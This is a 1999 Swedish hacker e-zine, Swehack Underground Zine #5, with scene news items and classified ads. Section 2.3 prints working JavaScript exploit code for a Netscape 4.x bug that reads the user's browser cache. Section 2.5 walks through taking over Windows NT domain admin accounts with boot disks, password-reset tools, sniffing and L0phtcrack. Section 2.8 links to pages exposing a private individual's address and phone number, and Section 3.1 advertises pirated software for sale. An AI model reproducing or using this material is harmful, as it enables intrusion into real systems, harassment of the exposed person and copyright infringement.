Digital Underground - Swehack Underground Zine #suz-5

____________________________________________________________________________ =======S====T====A====R====T=========O=====F=========F====I====L====E======= S W E H A C K U N D E R G R O U N D ______ _____ __ _ _______ ____/ | | \ | |______ /_____ __|__ | \_| |______ N U M M E R 5 ____________________________________________________________________________ I N N E H Å L L I S U Z # 5 [0.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ¤ Innehåll..............................................................0.1 ¤ Disclaimer............................................................0.2 ¤ Medarbetare...........................................................0.3 ¤ Ledare................................................................0.4 {s w e h a c k} ¤ Kanalen...............................................................1.1 ¤ Hemsidan..............................................................1.2 {h / p / v / c / a} ¤ Crackers tog kontroll över satellit...................................2.1 ¤ Dragonlinux på gång...................................................2.2 ¤ Bugg i Netscape Communicator 4.x.....................................2.3 ¤ Canal+ stänger ner i Danmark..........................................2.4 ¤ Windows NT lättknäckt.................................................2.5 ¤ Pentagon låter det hända..............................................2.6 ¤ Domänen Gud.com är såld...............................................2.7 ¤ Pedofilen avslöjas på Internet........................................2.8 ¤ Monicalewinsky.com crackad............................................2.9 {ö v r i g t} ¤ Svarta Börsen.........................................................3.1 - Säljes ¤ Hyperlänkar...........................................................3.2 ____________________________________________________________________________ D I S C L A I M E R [0.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ All information i denna filen är skriven i utbildnings syfte. Ni kan aldrig komma och påstå att denna filen uppmanar till brott eller något annat olag- ligt. Allt ni gör efter att ni läst något ur denna filen är helt på er egen risk och ni har själv allt ansvar för följderna. Vi avskriver oss härmed allt ansvar för era handlingar. ____________________________________________________________________________ M E D A R B E T A R E [0.3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Hallå!! Var är ni? ____________________________________________________________________________ L E D A R E [0.4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Äntligen är SUZ #5 färdig. Detta nummer har verkligen dragit ut på tiden och det ursäktar jag för. Jag kan berätta att det är två, eller egentligen tre saker som har bidragigt till förseningen. Sak nummer ett och två är att jag har varit på semester i tio dagar och att jag har varit ordentligt sjuk fem dagar där utöver. Jag har alltså inte haft tillgång till någon dator på cirka en halv månad, usch :-(. Den tredje saken är att jag inte fått in några artiklar och det tar lite tid att ensam skriva ihop ett helt nummer. Hoppas ni har förståelse för det. Hur som hälst så ska jag inom den närmaste framtiden hålla mig hemma och antagligen även frisk. Jag hoppas därför att nästa nummer kan komma ut om en månads tid. Men det förutsätter ju givetvis att jag har skrapat ihop tillräckligt med material till dess. Om någon är intresserad av att hjälpa till med att skriva i SUZ skulle jag verkligen bli glad då detta verkligen behövs. Om man vill hjälpa till men tror att man inte har kunskapen som behövs för att skriva artiklar kan man bidra genom att översätta engelska artiklar till svenska och kommentera dessa. Om någon är intresserad så hör av er! En glad nyhet är att SUZ nu har hamnat på flashbacks lista över svenska e-zines. Det är på följande adress listan finns. http://www.flashback.net/ezine/ Artiklar, nyheter, länkar, inlägg, annonser mm. för publicering i nästa nummer kan skickas till swehack@linux.nu. Gör Ni det så kommer förhoppnings- vis nästa nummer av SUZ ut som planerat, alltså någon gång i nästa månad. Tankar och idéer på vad som kan förbättras tags också tacksamt emot. Lev livet medans ni har det! No risk - No fun! // Contagion | con@linux.nu | 99-03-14 Allt rörande SUZ kan skickas till swehack@linux.nu ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< S W E H A C K >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ K A N A L E N [1.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Botten har varit nere ett bra tag nu men kommer tillbacks inom den närmaste tiden. Den stora anledningen till varför den har varit nere är att datorn som den körs ifrån har uppgraderats. I väntan på de delar till uppgraderingen har botten inte kunnat vara uppe. Swehacks IRCkanal:....................#Swehack...DALnet (irc.dal.net) ____________________________________________________________________________ H E M S I D A N [1.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Swehack har fått en ny logga vilken har lagts till på hemsidan. Ni får gärna komma med synpunkter och kritik angående denna logga. Filarkivet har inte uppdaterats på sistonde så det kommer att läggas ner lite energi på detta den närmaste tiden. Hemsidan kommer snart erbjuda Nät-TV från Biztech TV direkt i RealVideo- format. Det är programmet "Parse: Hack/Phreak" som kommer att visas. Det görs ett "Parse: Hack/Phreak program" per vecka och det senaste programmet kommer ni att kunna se direkt på Sewhacksidan. Det planeras att läggas till på sidan redan om ett par dagar så håll utkik! Swehacks hemsida:.....................http://www.flashback.net/~mm/swehack/ http://swehack.cjb.net/ ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< H / P / V / C / A >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ C R A C K E R S T O G S A T E L L I T [2.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ För ett tag sedan tog en grupp av crackers/dataterrorister kontroll över en av Englands Skynet 4 millitärkommunikations satelliter. De som tog över satelliten ändrade dess kurs vilket upptäcktes av bland annat NORAD. Crackerna har krävt Englands regering på en okänd summa pengar för att lämna tillbaka kontrollen över satelliten. Om inte regeringen vill samarbeta hotar terroristerna med att bränna allt bränsle som finns ombord på satelliten. Den stora frågan är hur detta kunde ske. För att kunna ta kontroll över satelliten behöver man ta sig förbi ett flertal elektroniska säkerhets system. För att sedan kunna ändra kursen på satelliten behöver man knäcka de krypterade kommando nycklarna. En hel del andra saker behövs också göras där ibland ta reda på den specifika sändnings våglängden för satellitens funktionssystem. Man tror att övertagningen var ett insider jobb. Antingen så fanns det en bakdörr i funktionssystemet som hade skapats av just den här anledningen eller så sålde någon kommandonycklarna. Att ändra satellitens kurs är heller ingen enkel sak. Den ändrades på ett sätt som gjorde att det uppmärksammades men ändå på ett sätt så att Englands regeringen kunde återställa kursen till den gamla igen. Det är inte känt ifall England har fått tillbaks kontrollen eller om de håller på att betala lösensumman som terroristerna krävde. Denna incidenten faller både under cyberkrig- och cyberterrorismdefinitionerna så det är tveksamt ifall England kommer att betala överhuvudtaget. Om de betalar så ökar risken för att liknande incidenter kommer att ske i framtiden. ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: AntiOnline, http://www.antionline.com/ ---------------------------------------------------------------------------- ____________________________________________________________________________ D R A G O N L I N U X P Å G Å N G [2.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Dragonlinux är namnet på en ny Linux distribution vars styrka är att den tar upp mycket liten plats och att den kan köras på samma partition som Windows. En installation på 25 MB räcker för att det ska fungera fullt ut med nätverksverktyg och dokumentation. Givetvis finns Dragonlinux att ladda ner gratis. Nyheter kommer hela tiden och Dragonlinux utvecklas för fullt. För mer information och för en egen kopia av Dragonlinux så besök deras hemsida. Dragonlinuxs hemsida:.................http://www.dragonlinux.nu/ ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu ---------------------------------------------------------------------------- ____________________________________________________________________________ B U G G I N E T S C A P E C . 4 . X [2.3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Det har upptäckts en bugg i Netscape Communicator 4.5 Win95, 4.08 WinNT (antagligen i alla 4.x versioner). Buggen möjliggör att man kan läsa inne- hållet i lokala HTML filer. Med innehållet menas inte själva koden utan det som användaren ser. Man kan även läsa innehållet i HTML filer på en webserver som blockerats av en brandvägg. Browsern och webservern måste dock vara på samma sida av brandväggen. Ytterliggare möjligheter som öppnas i och med buggen är att läsa användares cache, se deras bibilotek och antagligen en massa andra saker. Exploiten använder sig av JavaScript find() funktionen och ILAYER taggen. Detta kan köras genom användandet av HTML medelande. Här följer källkoden för exploiten: MBEGIN <ILAYER SRC="wysiwyg://1/about:cache"> </ILAYER> <SCRIPT> //mag='MBEGIN'; mag='Average cache'; mend='MEND'; res=mag; charstoread=100; function readit() { for(i=0;i<charstoread;i++) { t=res; find(mend); for(c=1;c<256;c++) { t=res + String.fromCharCode(c); if (find(t,true,true)) { // alert(c); res=t; } } } res=res.substring(mag.length); alert("The first URL in your cache is: \n" + res); } setTimeout('readit();',3000); </SCRIPT> MEND Än så länge finns det ingen lösning på problemet mer än att stänga av JavaScript i browsern. ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Buggen hittades av Georgi Guninski ---------------------------------------------------------------------------- ____________________________________________________________________________ C A N A L + S T Ä N G E R N E R [2.4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Canal+ stänger ner sina analoga sändningar i Danmark. Detta dör de efter ett års erfarenhet av marknaden. Undersökningar har visat att 250 000 människor tittar på Canal+, men bara 15 000 av dem betalar för det. De ska nu bara sända digitalt och Canal+s kunder kommer att bli erbjudna en Philips Mpeg2 mottagare med fri installation samt fri avgift för ett år. Genom att göra så här räknar man med att tjäna 20 miljoner danska kronor per år. ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu ---------------------------------------------------------------------------- ____________________________________________________________________________ W I N D O W S N T L Ä T T K N Ä C K T [2.5] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Windows NT är C2-klassat och anses ha hög säkerhet. Men klassningen är gjord utan diskettstation och nätverksanslutning. Det finns det mycket goda skäl för. En av landets ledande experter på datasäkerhet, Mikael Simovits, visade i samarbete med ICLs affärsenhet Nät- och Säkerhetslösningar hur enkelt det är att knäcka Windows NT. Det var vid PC World Expo han knäckte säkerheten i Windows NT, och detta gjordes från en klient som inte ens tillhörde den domän som blev attackerad. Vid attacken användes bland annat cracker- programmet L0phtcrack, säkerhetsskannern Asmodeus Security Scanner och Linux-programmet CHNTPW. Det ska dock påpekas att angreppet kräver att man har fysisk tillgång till det lokala nätverket. Med hjälp av en Linux bootdiskett bootade Mikael den dator som han använde som bas för sin attack mot nätverket. Med Linux-programmet CHNTPW eller NT Crackboot ligger hela hårddisken öppen för att läsa och förändra då NTs säkerhetsfunktioner inte är i drift i och med att programmet körs från startdisketten. Då kan man enkelt se till att man i fortsättningen kan köra NT-klienten med administratörsrättigheter. Ett annat sätt att göra samma sak är att ansluta en annan NT-maskin via en seriell kabel ansluten till datorernas 232-portar för att sedan boota datorn via en klientdiskett. Den andra NT-maskinens hårddisk kommer då att fungera som den förstas "andra hårddisk". Med hjälp av NT Locksmith kan du sedan skriva över administratörens eller användarens lösenord. Med Windows NT igång igen kunde han naturligtvis inte komma åt domänens datorer, men det går att komma åt information om en annan domän genom att montera den med hjälp av NT Explorer och sedan söka efter alla "Domain Admins". Det görs med hjälp av programmet User Admin for Domains. När det är klart har man fått kunskap om alla användare som är "Domain Admins". Sedan är det dags att använda ett snifferprogram. Efter en tids körning letar man efter de användare som är "Domain Admins" och samlar in deras krypterade lösenord. Dessa knäcktes sedan med programmet L0phtcrack, som för övrigt har stöd för flera ordlistor, bruteforce-metoden, möjligheter att sniffa nätverkstrafiken mm. Mer NT relaterad information kan du finna på följande sidor. http://www.microsoft.com/security/ http://www.infowar.co.uk/mnemonix/ http://www.it.kth.se/~rom/ntsec.html http://www.rat.pp.se/hotel/panik/ http://neworder.box.sk/ http://l0pht.com/ http://www.webtrends.com/wss/ http://www.simovits.com/ ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: Windows NT knäckt på 60 minuter av Joacim von Braun ---------------------------------------------------------------------------- ____________________________________________________________________________ P E N T A G O N L Å T E R D E T H Ä N D A [2.6] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ En medlem av "the Department of Defense" berättade för AntiOnline att Pentagon har tagigt ner de aktiva brandväggarna som i vanliga fall skyddar dem från attacker. Den anonyma källan menar att det är som att vara målet för en full ISS scan. Källan lägger också till att Pentagon samlar ihop resurser och förbereder för vad de kallar en "electronic Desert Storm". De låter det helt enkelt hända... ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: AntiOnline, http://www.antionline.com/ ---------------------------------------------------------------------------- ____________________________________________________________________________ G U D . C O M Ä R S Å L D [2.7] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ I förra numret av SUZ uppmärksammade vi att namnpiraterna Control-Alt-Delete stöttar Flashbacks ansvarige utgivare Jan Axelsson genom att dela med sig av vinsten de får på domänen Gud.com. Denna är nu såld för 20 001 kr till Solheim System AB som donerar domänen till svenska kyrkan. Pengarna som Flashback får in kommer att oavkortat gå till rättegångskostnaderna och kostnaderna för skadeståndet som Flashback blivit dömda att betala. Flashbacks hemsida:...................http://www.flashback.se/justice/ Control-Alt-Delete's hemsida:.........http://www.controlaltdelete.com/ Solheim System AB's hemsida:..........http://www.solheim.se/gud.htm ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: Flashback, http://www.flashback.se/ ---------------------------------------------------------------------------- ____________________________________________________________________________ P E D O F I L E N A V S L Ö J A D [2.8] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ På Internet är Örebropedofilens namn, telefonnummer, adress, utbildning mm. avslöjat. Även två bilder på pedofilen har kommit ut och flera sidor innehåller denna information. De sidor som innehåller denna information är: (fungerar 99-03-13) http://meltingpot.fortunecity.com/egypt/692/ http://members.xoom.com/sviin/ http://members.xoom.com/rickhunter59/ http://www.phejs.freeservers.com/freeman/ http://members.xoom.com/FreeblirCepe/ Undrar vad PUL säger om dessa sidor ;-) ?! Aftonbladets artikel om pedofilen finns att läsa på: http://www.aftonbladet.se/nyheter/9903/01/pedofil1.html ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu ---------------------------------------------------------------------------- ____________________________________________________________________________ M O N I C A L E W I N S K Y C R A C K A D [2.9] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ http://www.monicalewinsky.com/ crackades för tio dagar sen. På deras första- sida skrev den ansvariga för brottet, "MagicFX", vad han tyckte om situationen som har uppstått kring Monica Lewinsky. Även "Cyrus" skrev några ord om det hela där han påpekade att Bill Clinton har gjort fel och att han ska straffas för vad han gjort enligt lag. I stort sätt menar de att systemet är fel, men vem tycker inte det? De lämnade också efter sig lite bilder med texten: "irc.psychic.com". En mirror av den crackade sidan finns på: http://www.hackernews.com/archive/monica/monica.html Den riktiga sidan finns på: http://www.monicalewinsky.com/ ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu ---------------------------------------------------------------------------- ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< Ö V R I G T >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ S V A R T A B Ö R S E N [3.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - - S ä l j e s - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Warez/Appz/Gamez/Mp3 CD skivor säljes. Har 230 stycken med Warez/Appz/Gamez och runt 60 stycken CD skivor (kan skaffa 150 stycken) med Mp3. Har också ISO spel och VCD, det vill säga filmer som går att köra med vanlig CDläsare. Pris från 100 - 200 kr. Maila mig för listorna! _OcToDuR_ (octodur@linux.nu eller borqa@hotmail.com) (IRC: DALnet: #SweHack och #Calmare - EFnet: #BTF, #Hack.se och #Partille) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ____________________________________________________________________________ H Y P E R L Ä N K A R [3.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ http://swe-doc.linux.nu/ Här kan du hitta linux relaterad information på svenska. Swe-doc är ett ideellt projekt som går ut på att översätta all linuxdokumentation till svenska. Trots att detta är ett relativt nytt projekt finns det många bra textfiler att ladda hem eller att läsa online. Ett mycket fint initiativ som är ett måste för Linux nybörjaren. http://freshmeat.net/ En av de bästa linux sidorna på nätet. Denna sajt måste bara alla linux freaks besöka. Den innehåller allt från de senaste nyheterna till ett enormt filarkiv. ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ____________________________________________________________________________ __ _ _ _____ / _\ | | | | / _ / Redaktör: Contagion | con@linux.nu \ \ | | | | \// / _\ \ | |_| |_ / //\_ Hemsida: http://swehack.cjb.net/ \__/(_)____(_)____(_) IRC: #Swehack @ DALnet Börja att prenumerera på Swehack Underground Zine genom att skicka ett e-mail med Subscribe som ämne (subject) till suz@linux.nu ____________________________________________________________________________ ____________________________________________________________________________ =========E====N====D============O=====F============F====I====L====E=========

← Svenska e-zines (1990-2008)